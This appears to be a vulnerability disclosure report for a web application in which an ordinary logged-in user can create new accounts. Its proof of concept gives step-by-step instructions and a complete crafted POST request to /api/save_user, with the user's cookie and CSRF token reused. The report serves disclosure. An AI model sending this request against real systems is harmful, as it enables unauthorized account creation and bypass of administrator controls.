✍️ Description

A simple user without Super Admin access is able to add further users to the system.

🕵️‍♂️ Proof of Concept (BurpSuite or proxy utility is required)

• 1;Simply add a simple User roled user ( USER A ).

• 2; Log in with USER A

• 3; Obtain the X-Csrf-Token and the Cookie value of USER A

• 4; Send the following request with modified values and insert the obtained X-Csrf-Token and the Cookie value

POST /api/save_user HTTP/1.1
Host: <INSERT_HOSTNAME_HERE>
Content-Length: 226
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: <INSERT_HOSTNAME_HERE>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<INSERT_HOSTNAME_HERE>/admin/view:modules/load_module:users/edit-user:0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: <INSERT_COOKIE_HERE>

thumbnail=&id=0&token=<INSERT_X-Csrf-Token_HERE>&username=<INSERT_NEW_USERNAME_HERE>&password=<INSERT_NEW_PASSSWORD_HERE>&verify_password=<INSERT_NEW_PASSSWORD_HERE>&first_name=unauthorized&last_name=user&email=<INSERT_EMAIL_HERE>&phone=&roles%5B%5D=User&is_active=1&basic_mode=0&api_key=

Upon sending the request, the user is being added, and the malicious user is able to log in.

💥 Impact

The administrator feature is being disclosed for any authenticated users. This means, the administrator logic controls can be bypassed.